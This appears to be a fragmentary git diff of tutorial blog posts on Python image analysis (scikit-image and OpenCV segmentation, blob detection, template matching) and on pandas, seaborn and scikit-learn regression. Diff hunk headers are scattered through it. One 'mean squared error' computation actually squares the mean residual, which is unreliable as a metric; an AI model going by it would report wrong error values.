# Sum all pixels in the scratch region (values =1)
scratch_area = np.sum(binary == 1)
print("Scratched area is: ", scratch_area, "Square pixels")

scale = 0.45 # microns / pixel
print("Scratched area in sq. microns is: ", scratch_area*((scale)**2), "Square microns")
    Scratched area is:  33485 Square pixels
 Scratched area in sq. microns is:  6780.712500000001 Square microns
     

    import matplotlib.pyplot as plt
    from skimage import io
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    import numpy as np
    from skimage.filters import threshold_otsu
    • Use glob to extract image names and load them.

import glob

        time = 0
        scale = 0.45 # microns/pixel
        time_list = []
        area_list = []
        path = "images/scratch_assay/*.*"
• Put the code from the single-image segmentation into a for loop to apply the segmentation to all images.

for file in glob.glob(path):
    img = io.imread(file)
    entropy_img = entropy(img, disk(3))
    thresh = threshold_otsu(entropy_img)
    binary = entropy_img <= thresh
    scratch_area = np.sum(binary == 1)
    scratch_area = scratch_area * ((scale) ** 2) # Convert to microns from pixel units
    print("time=", time, "hr ", "Scratch area=", scratch_area, "um\N{SUPERSCRIPT TWO}")
    time_list.append(time)
    area_list.append(scratch_area)
    time += 1
            time= 0 hr   Scratch area= 6768.765 um²
             time= 1 hr   Scratch area= 5605.807500000001 um²
             time= 2 hr   Scratch area= 4881.465 um²

            plt.plot(time_list, area_list, 'bo')  # Print blue dots scatter plot
            [<matplotlib.lines.Line2D at 0x295b35d21c0>]
             

            png


            from scipy.stats import linregress  # Linear regression

            slope, intercept, r_value, p_value, std_err = linregress(time_list, area_list)
            print("y = ",slope, "x", " + ", intercept)
            print("R\N{SUPERSCRIPT TWO} = ", r_value ** 2)
            y =  -507.25881818181824 x  +  6096.792681818182
             R² =  0.9568904267126052
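
To see how well the linear fit tracks the shrinking scratch, the fitted line can be overlaid on the scatter (a sketch reusing the slope and intercept computed above):

import numpy as np

t = np.array(time_list)
plt.plot(t, area_list, 'bo')             # measured scratch areas
plt.plot(t, slope * t + intercept, 'r')  # fitted regression line
plt.xlabel("time (hr)")
plt.ylabel("scratch area (um\N{SUPERSCRIPT TWO})")
plt.show()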
             

Tutorial 55 - Image segmentation followed by measurements - in python

            from skimage import measure, io, img_as_ubyte
            import matplotlib.pyplot as plt
            from skimage.color import label2rgb, rgb2gray
            import numpy as np
            import cv2
            image = img_as_ubyte(rgb2gray(io.imread('images/cast_iron1.tif')))
            scale = 0.6
            plt.imshow(image, cmap='gray')
            <matplotlib.image.AxesImage at 0x200892d89a0>
             

            png

            plt.hist(image.flat, bins=100, range=(0, 255))
            (array([    0.,    46.,   479.,  1449.,   966.,  1498.,  1081.,  1901.,
                      1408.,  2200.,  2605.,  1816.,  2434.,  1382.,  1474.,   686.,
                       719.,   387.,   439.,   275.,   322.,   311.,   195.,   347.,

            png

            from skimage.filters import threshold_otsu
            threshold = threshold_otsu(image)
            threshold
            93
             
            # Generate thresholded image
            thresholded_img = image < threshold
            plt.imshow(thresholded_img, cmap='gray')
            <matplotlib.image.AxesImage at 0x20089b28760>
             

            png

            # Remove edge touching regions
            from skimage.segmentation import clear_border

            edge_touching_removed = clear_border(thresholded_img)
            plt.imshow(edge_touching_removed, cmap='gray')
            <matplotlib.image.AxesImage at 0x20089c39ca0>
             

            png


          label_image = measure.label(edge_touching_removed, connectivity=image.ndim)
          plt.imshow(label_image)
          <matplotlib.image.AxesImage at 0x20089c9dbb0>
           

          png


          Using label2rgb

        image_label_overlay = label2rgb(label_image, image=image)
        plt.imshow(image_label_overlay)
        <matplotlib.image.AxesImage at 0x20089d0a8e0>
         

        png

#################################################
# Calculate properties
# Using regionprops or regionprops_table
all_props = measure.regionprops(label_image, image)
# Can print various parameters for all objects
for prop in all_props:
    print('Label: {} Area: {}'.format(prop.label, prop.area))
        • Compute image properties and return them as a pandas-compatible table.


props = measure.regionprops_table(label_image, image,
                                  properties=['label',
                                              'area', 'equivalent_diameter',
                                              'mean_intensity', 'solidity'])

        import pandas as pd
        df = pd.DataFrame(props)
        df.head()

        # To delete small regions...
        df = df[df['area'] > 50]
        df.head()

        Convert to micron scale

        df['area_sq_microns'] = df['area'] * (scale ** 2)
        df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (scale)
        df.head()
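
A quick way to eyeball the resulting size distribution in micron units (a sketch using the df built above):

plt.hist(df['equivalent_diameter_microns'], bins=20)
plt.xlabel('equivalent diameter (microns)')
plt.ylabel('count')
plt.show()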

        df.to_csv('data/cast_iron_measurements.csv')

        Tutorial 56 - Blob Detector for segmentation based on feature properties -in python-

blob - Baidu Baike (baidu.com)


        import matplotlib.pyplot as plt
        import numpy as np
        import cv2
        image = cv2.imread('images/cast_iron1.tif', 0)
• Set up the SimpleBlobDetector with default parameters.

            params = cv2.SimpleBlobDetector_Params()
            • Define thresholds

                params.minThreshold = 0
                params.maxThreshold = 255
                • Filter by Area.

                    params.filterByArea = True
                    params.minArea = 50
                    params.maxArea = 10000
                    • Filter by Color (black=0)

                        params.filterByColor = False  #Set true for cast_iron as we'll be detecting black regions
                        params.blobColor = 0
                        • Filter by Circularity

                            params.filterByCircularity = True
                            params.minCircularity = 0.5
                            params.maxCircularity = 1
                            • Filter by Convexity

                                params.filterByConvexity = True
                                params.minConvexity = 0.5
                                params.maxConvexity = 1
                                • Filter by InertiaRatio

                                    params.filterByInertia = True
                                    params.minInertiaRatio = 0
                                    params.maxInertiaRatio = 1
                                    • Distance Between Blobs

                                        params.minDistBetweenBlobs = 0
                                        • Setup the detector with parameters

                                            detector = cv2.SimpleBlobDetector_create(params)
                                            • Detect blobs

                                                keypoints = detector.detect(image)
                                                print("Number of blobs detected are : ", len(keypoints))
                                                Number of blobs detected are :  82
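
Each keypoint carries a position and an estimated diameter, so a quick size summary is possible (a sketch; keypoints comes from the detector above):

import numpy as np

sizes = np.array([k.size for k in keypoints])  # blob diameters in pixels
print("mean blob diameter (px):", sizes.mean())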
                                                 

                                                  img_with_blobs = cv2.drawKeypoints(image, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
                                                  plt.imshow(img_with_blobs)
                                                  <matplotlib.image.AxesImage at 0x2b46aa494f0>
                                                   

                                                  png


                                                import cv2
                                                import numpy as np
                                                from matplotlib import pyplot as plt
                                                from scipy import ndimage
                                                from skimage import measure, color, io
                                                img = cv2.imread('images/Osteosarcoma_01.tif')
• Extract only the blue channel, since DAPI / nuclear (blue) staining is the best channel for counting cells.


cells = img[:, :, 0]

                                                plt.imshow(cells, cmap='gray')
                                                <matplotlib.image.AxesImage at 0x2b36b074850>
                                                 

                                                png


                                              pixels_to_um = 0.454

STEP 1: Thresholded image for nuclei

• Threshold image to binary using OTSU. All thresholded pixels will be set to 255.

                                              ret1, thresh = cv2.threshold(cells, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
                                              plt.imshow(thresh, cmap='gray')
                                              <matplotlib.image.AxesImage at 0x2b36b181f10>
                                               

                                              png


                                            kernel = np.ones((3,3),np.uint8)
                                            opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)

                                            from skimage.segmentation import clear_border
                                            opening = clear_border(opening) # Remove edge touching grains
                                            plt.imshow(opening, cmap='gray') # This is our image to be segmented further using watershed
                                            <matplotlib.image.AxesImage at 0x2b36bd0d6d0>
                                             

                                            png


                                          sure_bg = cv2.dilate(opening,kernel,iterations=10)
                                          plt.imshow(sure_bg, cmap='gray') # Dark region is our sure background
                                          <matplotlib.image.AxesImage at 0x2b36c5b2ac0>
                                           

                                          png


                                        https://www.tutorialspoint.com/opencv/opencv_distance_transformation.htm

                                        dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)
                                        plt.imshow(dist_transform, cmap='gray') # Dist transformed img.
                                        <matplotlib.image.AxesImage at 0x2b36bd55d00>
                                         

                                        png


                                      print(dist_transform.max())  # gives about 21.9
                                      21.968996
                                       
                                      ret2, sure_fg = cv2.threshold(dist_transform,0.5*dist_transform.max(),255,0)
                                      plt.imshow(sure_fg, cmap='gray')
                                      <matplotlib.image.AxesImage at 0x2b36bdc25e0>
                                       

                                      png


                                    sure_fg = np.uint8(sure_fg)  # Convert to uint8 from float
                                    unknown = cv2.subtract(sure_bg,sure_fg)
                                    plt.imshow(unknown, cmap='gray')
                                    <matplotlib.image.AxesImage at 0x2b36be24c10>
                                     

                                    png


                                  ret3, markers = cv2.connectedComponents(sure_fg)
                                  plt.imshow(markers)
                                  <matplotlib.image.AxesImage at 0x2b36d8060a0>
                                   

                                  png


                                markers = markers + 10
                                • Now, mark the region of unknown with zero

                                  markers[unknown==255] = 0
                                  plt.imshow(markers, cmap='jet') # Look at the 3 distinct regions.
                                  <matplotlib.image.AxesImage at 0x2b36d8f51c0>
                                   

                                  png


                                markers = cv2.watershed(img,markers)
                                • Let us color boundaries in yellow.


                                img[markers == -1] = [0,255,255]  
                                • label2rgb - Return an RGB image where color-coded labels are painted over the image.

                                  img2 = color.label2rgb(markers, bg_label=0)
                                  plt.imshow(img2)
                                  <matplotlib.image.AxesImage at 0x2b36d9c4970>
                                   

                                  png

                                  plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
                                  <matplotlib.image.AxesImage at 0x2b36da2de50>
                                   

                                  png


props = measure.regionprops_table(markers, cells,
                                  properties=['label',
                                              'area', 'equivalent_diameter',
                                              'mean_intensity', 'solidity', 'orientation',
                                              'perimeter'])

import pandas as pd
df = pd.DataFrame(props)
df.head()

                                df = df[df['area'] > 50]
                                df.head()

                                df['area_sq_microns'] = df['area'] * (pixels_to_um ** 2)
                                df['equivalent_diameter_microns'] = df['equivalent_diameter'] * (pixels_to_um)
                                df.head()

                                import cv2
                                import numpy as np
                                import matplotlib.pyplot as plt
                                img_rgb = cv2.imread('images/Ti_powder.tif')
                                img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
                                plt.imshow(img_gray, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263a924c550>
                                 

                                png

                                template = cv2.imread('images/Ti_powder_single.tif', 0)
                                plt.imshow(template, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263ae0a4be0>
                                 

                                png

                                h, w = template.shape[::]
                                h, w
                                (18, 16)
                                 

                                # methods available: ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
                                # 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
                                res = cv2.matchTemplate(img_gray, template, cv2.TM_SQDIFF)
                                plt.imshow(res, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263ae0ff8e0>
                                 

                                png

                                min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
                                min_val, max_val, min_loc, max_loc
                                (4.0, 7702931.0, (318, 418), (66, 407))
                                 
# Use max_loc instead for every method except TM_SQDIFF (and TM_SQDIFF_NORMED),
# where the best match is at the minimum.
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)

# Draw a black rectangle with thickness 1.
cv2.rectangle(img_gray, top_left, bottom_right, 0, 1)

plt.imshow(img_gray, cmap='gray')
                                <matplotlib.image.AxesImage at 0x263ae4de220>
                                 

                                png
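Since the best-match location flips between min_loc and max_loc depending on the method, a small helper avoids copy-paste mistakes. A minimal sketch (the function name best_match_top_left is mine, not part of the tutorial):

def best_match_top_left(result, method):
    """Return the top-left corner of the best match for a given matching method."""
    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
    # Square-difference methods score the best match with the minimum;
    # correlation-based methods with the maximum.
    if method in (cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED):
        return min_loc
    return max_loc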

                                @@ -2133,12 +2131,12 @@

import cv2
import numpy as np
from matplotlib import pyplot as plt

img_rgb = cv2.imread('images/Ti_powder.tif')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('images/Ti_powder_single.tif', 0)
h, w = template.shape[::]

res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
plt.imshow(res, cmap='gray')
                              <matplotlib.image.AxesImage at 0x263ae67ac40>
                               

                              png

# Pick only values above 0.8. For TM_CCOEFF_NORMED, larger values = better fit.
threshold = 0.8

loc = np.where(res >= threshold)
# Outputs 2 arrays (row indices and column indices).
# Combine these arrays to get x, y coordinates - take x from one array and y from the other.

# Reminder: zip is an iterator of tuples where the first items are paired together, then the second items, then the third, etc.

for pt in zip(*loc[::-1]):  # [::-1] swaps the arrays so pt is an (x, y) coordinate for drawing.
    # Draw a rectangle around each object: we know the top left (pt),
    # so draw a rectangle matching the size of the template image.
    cv2.rectangle(img_rgb, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 1)  # BGR red rectangles with thickness 1.

plt.imshow(img_rgb)
                              <matplotlib.image.AxesImage at 0x263a957fc10>
                               

                              png
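Note that thresholding res usually fires on several neighboring pixels per particle, so len(loc[0]) overstates the object count. A simple greedy suppression pass can collapse clustered hits; this is a sketch of mine (suppress_close_points is not from the tutorial), assuming loc, h and w from above:

def suppress_close_points(points, min_dist):
    """Greedily keep only points at least min_dist apart (points are (x, y) tuples)."""
    kept = []
    for x, y in points:
        if all((x - kx) ** 2 + (y - ky) ** 2 >= min_dist ** 2 for kx, ky in kept):
            kept.append((x, y))
    return kept

matches = suppress_close_points(zip(*loc[::-1]), min_dist=min(h, w) // 2)
print(len(matches), 'distinct matches')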

                              @@ -6174,6 +6172,8 @@

diff --git a/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html b/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html
index b8b98119dd..1b9cf7c76a 100644
--- a/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html
+++ b/posts/DIP-Python tutorials for image processing and machine learning(36-42)-Pandas/index.html
@@ -44,8 +44,6 @@
@@ -410,14 +408,14 @@

• Plot a histogram

import pandas as pd

df = pd.read_csv('images/grains/grain_measurements.csv')
df['Area'].plot(kind='hist', title='Area', bins=50)
                            <AxesSubplot:title={'center':'Area'}, ylabel='Frequency'>
                             

                            png

• Create a DataFrame and set its index and columns

data = [[10, 200, 60],
        [12, 155, 45],
        [9, 50, -45.],
        [16, 240, 90]]

df = pd.DataFrame(data, index=[1, 2, 3, 4], columns=['Area', 'Intensity', 'Orientation'])
df
                            @@ -459,7 +457,7 @@

• Inspect column types and missing-value counts

import pandas as pd

df = pd.read_csv('data/manual_vs_auto.csv')
df.info()
                            <class 'pandas.core.frame.DataFrame'>
                             RangeIndex: 100 entries, 0 to 99
                             Data columns (total 7 columns):
                            @@ -478,13 +476,13 @@ 

• Check the number of rows and columns

df.shape
                          (100, 7)
                           
• View the whole table

df
                          @@ -615,7 +613,7 @@

• View the first 7 rows

df.head(7)
                          @@ -705,7 +703,7 @@

• View the last 7 rows

df.tail(7)
                          @@ -795,7 +793,7 @@

• Set a column as the index

df1 = df.set_index('Image')
df1.head()
                          @@ -868,7 +866,7 @@

• View the column names

df1.columns
                          Index(['Unnamed: 0', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',
                                  'Auto_th_4'],
                                 dtype='object')
                          @@ -876,13 +874,13 @@ 

• List the unique values of a column

df['Unnamed: 0'].unique()
                        array(['Set1', 'Set2', 'Set3', 'Set4'], dtype=object)
                         
• Rename a column

df1 = df.rename(columns={'Unnamed: 0': 'Image_set'})
df1.columns
                        Index(['Image_set', 'Image', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',
                                'Auto_th_4'],
                               dtype='object')
                        @@ -890,7 +888,7 @@ 

• Show the data types

df.dtypes
                      Unnamed: 0     object
                       Image          object
                       Manual        float64
                      @@ -903,7 +901,7 @@ 

• Show summary statistics

df.describe()
                    @@ -983,7 +981,7 @@

                    37 - Introduction to Pandas - Data Manipulation

import pandas as pd

df = pd.read_csv('data/manual_vs_auto.csv')
df.head()
                    @@ -1053,7 +1051,7 @@

df1 = df.drop('Manual2', axis=1)
df1.head()
                    @@ -1117,7 +1115,7 @@

df2 = df.drop(['Manual2', 'Auto_th_2'], axis=1)
df2.head()
                    @@ -1175,7 +1173,7 @@

df['Date'] = '2019-06-24'
df.head()
                    @@ -1248,7 +1246,7 @@

df.dtypes
                    Unnamed: 0     object
                     Image          object
                     Manual        float64
                    @@ -1262,7 +1260,7 @@ 

df['Date'] = pd.to_datetime('2019-06-24')
df.head()
                    @@ -1335,7 +1333,7 @@

df.dtypes
                    Unnamed: 0            object
                     Image                 object
                     Manual               float64
                    @@ -1349,11 +1347,11 @@ 

df.to_csv('data/manual_vs_auto_updated.csv')
• Delete a row

df1 = df.drop(df.index[1])
df1.head()
                    @@ -1429,7 +1427,7 @@

df1 = df.iloc[10:,]
df1.head()
                    @@ -1505,7 +1503,7 @@

df1 = df[df['Unnamed: 0'] != 'Set1']
df1.head()
                    @@ -1582,11 +1580,11 @@

import pandas as pd

df = pd.read_csv('data/manual_vs_auto.csv')
df2 = df.sort_values('Manual', ascending=True)  # ascending=True: sort in increasing order
• Select specific rows/columns

df2[['Manual', 'Auto_th_2']]
                    @@ -1654,7 +1652,7 @@

df[20: 30]
                    @@ -1775,7 +1773,7 @@

                    Pandas 读取某列、某行数据——loc、iloc 用法总结_子木同学的博客-CSDN 博客_pandas iloc

df.loc[20: 30, ['Manual', 'Auto_th_2']]
                    @@ -1842,7 +1840,7 @@

set2_df = df[df['Unnamed: 0'] == 'Set2']
set2_df.head()
                    @@ -1912,13 +1910,13 @@

max(set2_df['Manual'])
                    120.0
                     
• Select values by condition

df['Manual'] > 100
                    0     False
                     1     False
                     2      True
                    @@ -1932,7 +1930,7 @@ 

df[df['Manual'] > 100].head()
                    @@ -2002,7 +2000,7 @@

df[(df['Manual'] > 100) & (df['Auto_th_2'] < 100)].head()
                    @@ -2072,7 +2070,7 @@

for index, row in df.iterrows():
    average_auto = (row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3
    print(round(average_auto), row['Manual'])
                    80 92.0
                     76 87.0
                     89 104.0
                    @@ -2089,7 +2087,7 @@ 

                    39 - Introduction to Pandas - Grouping Data

import pandas as pd

df = pd.read_csv('data/manual_vs_auto.csv')
df = df.rename(columns={'Unnamed: 0': 'Image_set'})
df.head()
                    @@ -2156,7 +2154,7 @@

df = df.drop('Manual2', axis=1)
df.head()
                    @@ -2220,8 +2218,8 @@

group_by_file = df.groupby(by=['Image_set'])
set_data_count = group_by_file.count()
set_data_avg = group_by_file.mean()

set_data_count
                    @@ -2276,7 +2274,7 @@

set_data_avg
                    @@ -2328,11 +2326,11 @@
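count() and mean() each make a separate pass over the groups; agg() can compute several statistics at once. A small sketch, assuming the renamed df from above (the explicit column selection is mine, to keep the aggregation numeric):

set_summary = df.groupby('Image_set')[['Manual', 'Auto_th_2', 'Auto_th_3', 'Auto_th_4']].agg(['count', 'mean'])
set_summary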

df['Manual'].corr(df['Auto_th_2'])
                    0.7381233054217538
                     

                    40 - Introduction to Pandas - Dealing with missing -null- data

import pandas as pd

df = pd.read_csv('data/manual_vs_auto.csv')
df.head(8)
                    @@ -2432,7 +2430,7 @@

• View missing values

df.isnull()
                    @@ -2560,7 +2558,7 @@

                    100 rows × 7 columns

df.isnull().sum()
                    Unnamed: 0     0
                     Image          0
                     Manual         6
                    @@ -2573,7 +2571,7 @@ 

• Drop missing values

df = df.drop('Manual2', axis=1)
df2 = df.dropna()
df2.head(10)
                  @@ -2679,7 +2677,7 @@

df = pd.read_csv('data/manual_vs_auto.csv')
df.describe()
                  @@ -2761,7 +2759,7 @@

• Fill missing values

df['Manual'].fillna(100, inplace=True)
df.head(10)
                  @@ -2881,8 +2879,8 @@

• Fill missing values with the mean

import numpy as np

df = pd.read_csv('data/manual_vs_auto.csv')
df['Manual'] = df.apply(
    lambda row: round((row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3)  # mean of the three auto counts (the original summed Auto_th_3 twice)
    if np.isnan(row['Manual'])  # only where Manual is missing
    else row['Manual'], axis=1)  # written back into the Manual column

df.head(10)
                  @@ -3000,7 +2998,7 @@
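The same fill can be done without apply(), since fillna() accepts a Series aligned on the index. A vectorized sketch under the same assumptions (same column names, missing values only in Manual):

auto_mean = df[['Auto_th_2', 'Auto_th_3', 'Auto_th_4']].mean(axis=1).round()
df['Manual'] = df['Manual'].fillna(auto_mean)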

                  41 - Introduction to Pandas - Plotting

import pandas as pd

df = pd.read_csv('data/manual_vs_auto.csv')
df = df.rename(columns={'Unnamed: 0': 'Image_set'})
df.head()
                  @@ -3070,28 +3068,28 @@

df['Manual'].plot()
                  <AxesSubplot:>
                   

                  png

• Plot a histogram

# kind='hist', 30 bins, title 'Manual Count', figure size 12 x 10
df['Manual'].plot(kind='hist', bins=30, title='Manual Count', figsize=(12, 10))
                  <AxesSubplot:title={'center':'Manual Count'}, ylabel='Frequency'>
                   

                  png

df['Manual'].rolling(3).mean().plot()
                  <AxesSubplot:>
                   

                  png

df['Manual'].describe()
                  count     94.000000
                   mean     100.021277
                   std       11.285140
                  @@ -3102,22 +3100,22 @@ 

df['Manual'].plot(kind='box', figsize=(8, 6))
                  <AxesSubplot:>
                   

                  png

• Scatter plot

df.plot(kind='scatter', x='Manual', y='Auto_th_2', title='Manual vs Auto 2')
                  <AxesSubplot:title={'center':'Manual vs Auto 2'}, xlabel='Manual', ylabel='Auto_th_2'>
                   

                  png

def cell_count(x):
    if x <= 100.0:
        return 'low'
    else:
        return 'high'

df['cell_count_index'] = df['Manual'].apply(cell_count)
df.head()
                  @@ -3190,8 +3188,8 @@

df.to_csv('data/manual_vs_auto2.csv')

df.boxplot(column='Manual', by='cell_count_index')
                  <AxesSubplot:title={'center':'Manual'}, xlabel='cell_count_index'>
                   

                  png

                  @@ -3199,8 +3197,8 @@

                  Seaborn

import pandas as pd

df = pd.read_csv('data/manual_vs_auto.csv')
df['Manual'].fillna(100, inplace=True)
df = df.rename(columns={'Unnamed: 0': 'Image_Set'})

import seaborn as sns

sns.distplot(df['Manual'])
                C:\Users\gzjzx\anaconda3\lib\site-packages\seaborn\distributions.py:2619: FutureWarning: `distplot` is a deprecated function and will be removed in a future version. Please adapt your code to use either `displot` (a figure-level function with similar flexibility) or `histplot` (an axes-level function for histograms).
                   warnings.warn(msg, FutureWarning)
                 
                @@ -3212,32 +3210,32 @@ 
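The FutureWarning above is seaborn flagging distplot as deprecated. On seaborn 0.11 or newer the equivalent one-liner would be (a sketch, not what the notebook originally ran):

sns.histplot(df['Manual'], kde=True)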

sns.kdeplot(df['Manual'], shade=True)
sns.kdeplot(df['Auto_th_2'], shade=True)
sns.kdeplot(df['Auto_th_3'], shade=True)
sns.kdeplot(df['Auto_th_4'], shade=True)
                <AxesSubplot:xlabel='Manual', ylabel='Density'>
                 

                png

• sns.jointplot(): bivariate relationship plot

sns.jointplot(x='Manual', y='Auto_th_2', data=df, kind='kde')
                <seaborn.axisgrid.JointGrid at 0x212f9ad23d0>
                 

                png

• sns.pairplot(): pairwise relationships between features

sns.pairplot(df, x_vars=['Auto_th_2', 'Auto_th_3', 'Auto_th_4'], y_vars='Manual', height=6)
                <seaborn.axisgrid.PairGrid at 0x212f9bd0fd0>
                 

                png

• sns.lmplot(): show a linear relationship

sns.lmplot(x='Manual', y='Auto_th_2', data=df, order=1, hue='Image_Set')
                <seaborn.axisgrid.FacetGrid at 0x212fa457f70>
                 

                png

from scipy import stats

slope, intercept, r_value, p_value, std_err = stats.linregress(df['Manual'], df['Auto_th_2'])
slope, intercept, r_value, p_value, std_err
                (0.772483189743971,
                  -0.8937686381919718,
                  0.7058094587729904,
                @@ -3247,14 +3245,14 @@ 

df = pd.read_csv('data/manual_vs_auto2.csv')
df['Manual'].fillna(100, inplace=True)
df = df.rename(columns={'Unnamed: 0': 'Image_Set'})

sns.swarmplot(x='Image_Set', y='Manual', data=df, hue='cell_count_index', dodge=True)
                <AxesSubplot:xlabel='Image_Set', ylabel='Manual'>
                 

                png

• sns.heatmap(): heat map

corr = df.loc[:, df.dtypes == 'int64'].corr()  # correlates all int64 columns (the float64 measurement columns are excluded here)
sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, cmap=sns.diverging_palette(220, 10, as_cmap=True))
                <AxesSubplot:>
                 

                png

                @@ -7290,6 +7288,8 @@

diff --git a/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html b/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html
index 46e79c15fe..78e8caccd1 100644
--- a/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html
+++ b/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html
@@ -44,8 +44,6 @@
@@ -453,7 +451,7 @@

                44 - What is linear regression

A brief introduction to linear regression and the loss function it minimizes.
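As a reminder of what the lecture covers: the model is a line y = m*x + c, and training minimizes the mean squared error between predictions and data. A minimal sketch of that loss (mse_loss is my name for it, not the lecture's):

import numpy as np

def mse_loss(m, c, x, y):
    """Mean squared error of the line y_hat = m*x + c against data (x, y)."""
    y_hat = m * x + c
    return np.mean((y - y_hat) ** 2)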

                45 - Linear regression using Sci-Kit Learn in Python

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model

df = pd.read_csv('data/cells.csv')
df
                @@ -520,7 +518,7 @@

plt.xlabel('time')
plt.ylabel('cells')
plt.scatter(df.time, df.cells, color='red', marker='+')
                <matplotlib.collections.PathCollection at 0x2c7bd4eb0d0>
                 

                png

                @@ -532,7 +530,7 @@

x_df = df[['time']]
x_df
                @@ -587,19 +585,19 @@

x_df.dtypes
                time    float64
                 dtype: object
                 
y_df = df.cells
• Create and train the model

reg = linear_model.LinearRegression()  # Create an instance of the model
reg.fit(x_df, y_df)  # Train the model (fit a line)
• Make a prediction

# Predict
reg.predict([[2.3]])
                C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names
                   warnings.warn(
                 
                @@ -610,19 +608,19 @@ 
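The UserWarning above appears because the model was fitted on a DataFrame (with the feature name time) but predict received a bare list. Passing a one-row DataFrame with the same column name silences it; a sketch:

reg.predict(pd.DataFrame({'time': [2.3]}))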

reg.score(x_df, y_df)
                0.9784252641866715
                 
                • Y = mx + C
c = reg.intercept_
m = reg.coef_
2.3 * m + c
                array([257.61090909])
                 
• Predict many values at once

cells_predict_df = pd.read_csv('data/cells_predict.csv')
cells_predict_df.head()
                @@ -653,7 +651,7 @@

predicted_cells = reg.predict(cells_predict_df)
predicted_cells
                array([212.33090909, 214.38909091, 216.44727273, 218.50545455,
                        220.56363636, 222.62181818, 224.68      , 226.73818182,
                        228.79636364, 230.85454545, 232.91272727, 234.97090909,
                @@ -668,7 +666,7 @@ 

cells_predict_df['cells'] = predicted_cells
cells_predict_df.head()
                @@ -705,10 +703,10 @@

cells_predict_df.to_csv('predicted_cells.csv')

                46 - Splitting data into training and testing sets for machine learning

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model

df = pd.read_csv('data/cells.csv')
df
                @@ -775,12 +773,12 @@

x_df = df.drop('cells', axis='columns')
y_df = df.cells
• Split into a training set and a test set

from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.4, random_state=10)

X_train
                @@ -815,25 +813,25 @@

reg = linear_model.LinearRegression()
reg.fit(X_train, y_train)

prediction_test = reg.predict(X_test)
prediction_test
                array([229.66081871, 270.73684211, 291.2748538 , 260.46783626,
                        281.00584795])
                 
• Compute the mean squared error

# Note: this squares the mean residual; the usual MSE would be np.mean((prediction_test - y_test) ** 2)
print('Mean sq. error between y_test and predicted =', np.mean(prediction_test - y_test) ** 2)
                Mean sq. error between y_test and predicted = 7.677112273861912
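For the record, scikit-learn ships the conventional metric, which averages the squared residuals rather than squaring their mean. A sketch using the same variables:

from sklearn.metrics import mean_squared_error

print('MSE =', mean_squared_error(y_test, prediction_test))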
                 
• Plot the residuals

plt.scatter(prediction_test, prediction_test - y_test)
plt.hlines(y=0, xmin=200, xmax=310)  # draw a horizontal reference line
                <matplotlib.collections.LineCollection at 0x26a2470d640>
                 

                png

                47 - Multiple Linear Regression with SciKit-Learn in Python

import pandas as pd

df = pd.read_excel('data/images_analyzed.xlsx')
df.head()
                @@ -888,14 +886,14 @@

import seaborn as sns

sns.lmplot(x='Time', y='Images_Analyzed', data=df, hue='Age')
                <seaborn.axisgrid.FacetGrid at 0x238adc47910>
                 

                png

import numpy as np
from sklearn import linear_model

reg = linear_model.LinearRegression()
reg.fit(df[['Time', 'Coffee', 'Age']], df.Images_Analyzed)

reg.coef_, reg.intercept_
                (array([-0.35642282, -0.3475    , -0.04279945]), 25.189636192124166)
                 
reg.predict([[13, 2, 23]])
                C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names
                   warnings.warn(
                 
                @@ -910,7 +908,7 @@ 

• STEP 1: DATA READING AND UNDERSTANDING
import pandas as pd
from matplotlib import pyplot as plt

df = pd.read_csv('data/images_analyzed_productivity1.csv')
df.head()
              @@ -971,11 +969,11 @@

plt.scatter(df.Time, df.Productivity, marker='+', color='red')
              <matplotlib.collections.PathCollection at 0x206c9140bb0>
               

              png

sizes = df['Productivity'].value_counts(sort=1)
plt.pie(sizes, autopct='%1.1f%%')
              ([<matplotlib.patches.Wedge at 0x206cc3afb80>,
                 <matplotlib.patches.Wedge at 0x206cc3b9310>],
                [Text(-0.08630492316306847, 1.096609073570804, ''),
              @@ -987,7 +985,7 @@ 

• STEP 2: DROP IRRELEVANT DATA

df.drop(['Images_Analyzed'], axis=1, inplace=True)
df.drop(['User'], axis=1, inplace=True)
df.head()
            @@ -1039,12 +1037,12 @@

